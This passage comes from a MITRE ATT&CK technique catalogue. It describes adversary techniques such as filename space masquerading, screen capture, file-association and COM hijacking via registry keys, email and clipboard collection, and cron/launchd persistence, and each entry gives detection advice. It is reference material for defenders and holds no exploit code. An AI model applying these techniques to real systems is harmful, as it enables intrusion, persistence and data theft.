<p>Adversaries can hide a program&#8217;s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).</p>
</div>
<div class="paragraph">
<p>Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</p>
</div>
<div class="paragraph">
<p>Detection: It&#8217;s not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user&#8217;s perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Erye Hernandez, Palo Alto Networks</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 783. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1151">https://attack.mitre.org/wiki/Technique/T1151</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/">https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_screen_capture_t1113"><a class="anchor" href="#_screen_capture_t1113"></a><a class="link" href="#_screen_capture_t1113">Screen Capture - T1113</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;. (Citation: Antiquated Mac Malware)</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 784. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1113">https://attack.mitre.org/wiki/Technique/T1113</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_removal_from_tools_t1066"><a class="anchor" href="#_indicator_removal_from_tools_t1066"></a><a class="link" href="#_indicator_removal_from_tools_t1066">Indicator Removal from Tools - T1066</a></h3>
<div class="paragraph">
<p>If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target&#8217;s defensive systems or subsequent targets that may use similar systems.</p>
</div>
<div class="paragraph">
<p>A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use Software Packing or otherwise modify the file so it has a different signature, and then re-use the malware.</p>
</div>
<div class="paragraph">
<p>Detection: The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Anti-virus, Binary file metadata, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 785. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1066">https://attack.mitre.org/wiki/Technique/T1066</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_change_default_file_association_t1042"><a class="anchor" href="#_change_default_file_association_t1042"></a><a class="link" href="#_change_default_file_association_t1042">Change Default File Association - T1042</a></h3>
<div class="paragraph">
<p>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.</p>
</div>
<div class="paragraph">
<p>System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example:
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
*&lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.</p>
</div>
<div class="paragraph">
<p>Detection: Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.</p>
</div>
<div class="paragraph">
<p>User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user&#8217;s preference will occur under this entry&#8217;s subkeys.</p>
</div>
<div class="paragraph">
<p>Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 786. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1042">https://attack.mitre.org/wiki/Technique/T1042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs">https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/bb166549.aspx">http://msdn.microsoft.com/en-us/library/bb166549.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_email_collection_t1114"><a class="anchor" href="#_email_collection_t1114"></a><a class="link" href="#_email_collection_t1114">Email Collection - T1114</a></h3>
<div class="paragraph">
<p>Adversaries may target user email to collect sensitive information from a target.</p>
</div>
<div class="paragraph">
<p>Files containing email data can be acquired from a user&#8217;s system, such as Outlook storage or cache files .pst and .ost.</p>
</div>
<div class="paragraph">
<p>Adversaries may leverage a user&#8217;s credentials and interact directly with the Exchange server to acquire information from within a network.</p>
</div>
<div class="paragraph">
<p>Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</p>
</div>
<div class="paragraph">
<p>Detection: There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.</p>
</div>
<div class="paragraph">
<p>File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring, Process monitoring, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 787. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1114">https://attack.mitre.org/wiki/Technique/T1114</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_information_discovery_t1082"><a class="anchor" href="#_system_information_discovery_t1082"></a><a class="link" href="#_system_information_discovery_t1082">System Information Discovery - T1082</a></h3>
<div class="paragraph">
<p>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, Systeminfo, and &lt;code&gt;dir&lt;/code&gt; within cmd for identifying information based on present files and directories.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, the &lt;code&gt;systemsetup&lt;/code&gt; command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the &lt;code&gt;system_profiler&lt;/code&gt; gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 788. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1082">https://attack.mitre.org/wiki/Technique/T1082</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_network_connections_discovery_t1049"><a class="anchor" href="#_system_network_connections_discovery_t1049"></a><a class="link" href="#_system_network_connections_discovery_t1049">System Network Connections Discovery - T1049</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net.</p>
</div>
<div class="paragraph">
<p>===Mac and Linux ===</p>
</div>
<div class="paragraph">
<p>In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 789. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1049">https://attack.mitre.org/wiki/Technique/T1049</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_local_job_scheduling_t1168"><a class="anchor" href="#_local_job_scheduling_t1168"></a><a class="link" href="#_local_job_scheduling_t1168">Local Job Scheduling - T1168</a></h3>
<div class="paragraph">
<p>On Linux and Apple systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike Scheduled Task on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).</p>
</div>
<div class="paragraph">
<p>===cron===</p>
</div>
<div class="paragraph">
<p>System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; file, &lt;code&gt;/etc/cron.d/&lt;/code&gt; directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on Mac and Linux systems.</p>
</div>
<div class="paragraph">
<p>Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.</p>
</div>
<div class="paragraph">
<p>===at===</p>
</div>
<div class="paragraph">
<p>The at program is another means on Linux-based systems, including Mac, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.</p>
</div>
<div class="paragraph">
<p>===launchd===</p>
</div>
<div class="paragraph">
<p>Each launchd job is described by a different configuration property list (plist) file similar to Launch Daemon or Launch Agent, except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.</p>
</div>
<div class="paragraph">
<p>Detection: Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, User, root</p>
</div>
<div class="paragraph">
<p>Contributors: Anastasios Pingios</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 790. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1168">https://attack.mitre.org/wiki/Technique/T1168</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://linux.die.net/man/5/crontab">https://linux.die.net/man/5/crontab</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://linux.die.net/man/1/at">https://linux.die.net/man/1/at</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/">https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_two_factor_authentication_interception_t1111"><a class="anchor" href="#_two_factor_authentication_interception_t1111"></a><a class="link" href="#_two_factor_authentication_interception_t1111">Two-Factor Authentication Interception - T1111</a></h3>
<div class="paragraph">
<p>Use of two- or multifactor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. Adversaries may target authentication mechanisms, such as smart cards, to gain access to systems, services, and network resources.</p>
</div>
<div class="paragraph">
<p>If a smart card is used for two-factor authentication (2FA), then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)</p>
</div>
<div class="paragraph">
<p>Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</p>
</div>
<div class="paragraph">
<p>Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials.</p>
</div>
<div class="paragraph">
<p>Detection: Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.</p>
</div>
<div class="paragraph">
<p>Out-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.</p>
</div>
<div class="paragraph">
<p>Hardware token: Access to the seed and algorithm of generating one-time codes.</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 791. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1111">https://attack.mitre.org/wiki/Technique/T1111</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dl.mandiant.com/EE/assets/PDF%20MTrends%202011.pdf">https://dl.mandiant.com/EE/assets/PDF%20MTrends%202011.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_execution_through_api_t1106"><a class="anchor" href="#_execution_through_api_t1106"></a><a class="link" href="#_execution_through_api_t1106">Execution through API - T1106</a></h3>
<div class="paragraph">
<p>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)</p>
</div>
<div class="paragraph">
<p>Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)</p>
</div>
<div class="paragraph">
<p>*CreateProcessA() and CreateProcessW(),
*CreateProcessAsUserA() and CreateProcessAsUserW(),
*CreateProcessInternalA() and CreateProcessInternalW(),
*CreateProcessWithLogonW(), CreateProcessWithTokenW(),
*LoadLibraryA() and LoadLibraryW(),
*LoadLibraryExA() and LoadLibraryExW(),
*LoadModule(),
*LoadPackagedLibrary(),
*WinExec(),
*ShellExecuteA() and ShellExecuteW(),
*ShellExecuteExA() and ShellExecuteExW()</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 792. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1106">https://attack.mitre.org/wiki/Technique/T1106</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms682425">http://msdn.microsoft.com/en-us/library/ms682425</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://skanthak.homepage.t-online.de/verifier.html">https://skanthak.homepage.t-online.de/verifier.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_component_object_model_hijacking_t1122"><a class="anchor" href="#_component_object_model_hijacking_t1122"></a><a class="link" href="#_component_object_model_hijacking_t1122">Component Object Model Hijacking - T1122</a></h3>
<div class="paragraph">
<p>The (Citation: Microsoft Component Object Model) (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary&#8217;s code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</p>
</div>
<div class="paragraph">
<p>Detection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within &lt;code&gt;HKEY_CURRENT_USER\Software\Classes\CLSID\&lt;/code&gt; may be anomalous and should be investigated since user objects will be loaded prior to machine objects in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;. (Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, DLL monitoring, Loaded DLLs</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Autoruns Analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: ENDGAME</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 793. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1122">https://attack.mitre.org/wiki/Technique/T1122</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/ms694363.aspx">https://msdn.microsoft.com/library/ms694363.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence">https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com">https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clipboard_data_t1115"><a class="anchor" href="#_clipboard_data_t1115"></a><a class="link" href="#_clipboard_data_t1115">Clipboard Data - T1115</a></h3>
<div class="paragraph">
<p>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard)</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents (Citation: Operating with EmPyre).</p>
</div>
<div class="paragraph">
<p>Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 794. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1115">https://attack.mitre.org/wiki/Technique/T1115</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/ms649012">https://msdn.microsoft.com/en-us/library/ms649012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/">http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_window_t1143"><a class="anchor" href="#_hidden_window_t1143"></a><a class="link" href="#_hidden_window_t1143">Hidden Window - T1143</a></h3>
<div class="paragraph">
